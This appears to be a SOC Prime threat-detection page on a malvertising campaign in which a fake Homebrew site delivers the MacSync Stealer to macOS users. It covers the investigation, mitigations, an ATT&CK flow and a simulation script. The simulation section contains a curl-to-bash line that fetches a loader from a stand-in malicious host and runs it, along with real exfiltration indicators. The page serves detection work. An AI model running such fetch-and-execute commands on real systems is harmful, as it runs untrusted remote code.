SOC Prime Bias: Medium

05 May 2026 17:17
newspaper icon SANS Internet Storm Center

Fake Homebrew Ad Leads to MacSync Stealer Infection

Author Photo
SOC Prime Team linkedin icon Follow
Fake Homebrew Ad Leads to MacSync Stealer Infection
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Attackers are using malicious search ads to direct users to a fake Homebrew website that targets macOS systems with the MacSync Stealer. The spoofed page instructs victims to copy and run a shell command that downloads and launches the malware. Once active, the stealer gathers credentials and system details, compresses the stolen data into a ZIP archive, and sends it to a command-and-control server. The campaign highlights the growing use of malvertising to compromise macOS users.

Investigation

The analyst traced the attack from the malicious ad to an impersonated Homebrew page hosted on Google Sites. That page presented a zsh command which, when executed, downloaded additional scripts from attacker-controlled infrastructure and created a temporary ZIP archive containing collected data. Network traffic confirmed that the archive was exfiltrated to the domain glowmedaesthetics.com. Researchers documented the relevant indicators, including URLs, domains, and file paths tied to the infection chain.

Mitigation

Users should avoid copying and running commands from untrusted websites and should verify the legitimacy of package manager pages before interacting with them. Ad-blocking or security-focused browser extensions can help reduce exposure to malicious sponsored links. On macOS, Gatekeeper should remain enabled and application execution should be limited to trusted, signed software. Defenders should also monitor outbound traffic for connections to unfamiliar domains.

Response

Security teams should detect execution of the suspicious zsh command and any curl activity reaching the identified malicious URL. Alerts should also be generated for creation of the /tmp/osalogging.zip archive and for outbound traffic to glowmedaesthetics.com. If infection is suspected, isolate the affected system, collect forensic evidence, and reset any compromised credentials.

"graph TB %% Class Definitions classDef technique fill:#99ccff %% Node definitions initial_malicious_link["<b>Technique</b> – <b>T1204.001 Malicious Link</b><br/><b>Description</b>: Victim clicks a malicious URL in an ad and is directed to a counterfeit Homebrew download page."] class initial_malicious_link technique user_copy_paste["<b>Technique</b> – <b>T1204.004 Malicious Copy and Paste</b><br/><b>Description</b>: Victim copies a crafted script from the webpage and pastes it into the Terminal, executing attacker code."] class user_copy_paste technique unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: Zsh script runs, downloading additional payload from glowmedaesthetics.com."] class unix_shell technique gui_input_capture["<b>Technique</b> – <b>T1056.002 GUI Input Capture</b><br/><b>Description</b>: Fake graphical password prompt captures the macOS user password."] class gui_input_capture technique local_data_staging["<b>Technique</b> – <b>T1074.001 Local Data Staging</b><br/><b>Description</b>: System information and logs are archived into /tmp/osalogging.zip for later exfiltration."] class local_data_staging technique exfiltration_c2["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: The zip file is sent to the attackeru2019s C2 server over HTTPS."] class exfiltration_c2 technique gather_software_info["<b>Technique</b> – <b>T1592.002 Software</b><br/><b>Description</b>: Script enumerates installed software to build an inventory of the victim host."] class gather_software_info technique data_local_system["<b>Technique</b> – <b>T1005 Data from Local System</b><br/><b>Description</b>: Reads additional local files to include in the exfiltrated archive."] class data_local_system technique %% Connections initial_malicious_link –>|leads_to| user_copy_paste user_copy_paste –>|leads_to| unix_shell unix_shell –>|leads_to| gui_input_capture gui_input_capture –>|leads_to| local_data_staging local_data_staging –>|leads_to| exfiltration_c2 local_data_staging –>|also leads_to| gather_software_info local_data_staging –>|also leads_to| data_local_system "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Initial Lure: The victim receives a phishing email containing a link to a counterfeit Homebrew “tap” page that hosts a malicious installation script.

    2. Execution: The victim copies the one‑liner from the page and pastes it into their terminal:

      curl -fsSL https://malicious.example.com/macsyncloader.sh | /bin/bash
      • The curl binary is invoked (matches the rule).

    3. Downloader Script (macsyncloader.sh):

      • Downloads the MacSync payload via curl.
      • Writes the payload to /tmp/.macsync and executes it.
      • Pops up credential‑stealing dialogs (simulated via osascript on macOS, but here we simply echo).

    4. Persistence: The script registers a LaunchAgent to run at login (outside the scope of the current rule but relevant for broader detection).

  • Regression Test Script: The following Bash script reproduces the exact steps, ensuring the telemetry aligns with the detection logic.

    #!/usr/bin/env bash
set -euo pipefail

# -------------------------------------------------
# Simulated attacker-controlled script host
# -------------------------------------------------
MALICIOUS_HOST="https://malicious.example.com"
LOADER="${MALICIOUS_HOST}/macsyncloader.sh"

# -------------------------------------------------
# Step 1: Download and execute the malicious loader
# -------------------------------------------------
echo "[*] Triggering detection rule by invoking curl ..."
curl -fsSL "$LOADER" | /bin/bash

# -------------------------------------------------
# Step 2: (Inside the loader) – Simulated payload
# -------------------------------------------------
# The loader would normally be fetched from the remote host.
# For the purpose of this test we embed the payload inline.
cat <<'PAYLOAD' > /tmp/.macsync
#!/usr/bin/env bash
echo "MacSync payload executed – exfiltrating host info..."
# Simulate credential grab (no real data)
echo "Collected credentials: user@example.com / password123"
PAYLOAD

chmod +x /tmp/.macsync
/tmp/.macsync

echo "[*] Simulation complete."

  • Cleanup Commands: Remove artifacts and terminate any lingering processes.

    #!/usr/bin/env bash
set -euo pipefail

echo "[*] Cleaning up simulation artifacts ..."
rm -f /tmp/.macsync
# No persistent services were created in this test
echo "[*] Cleanup finished."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free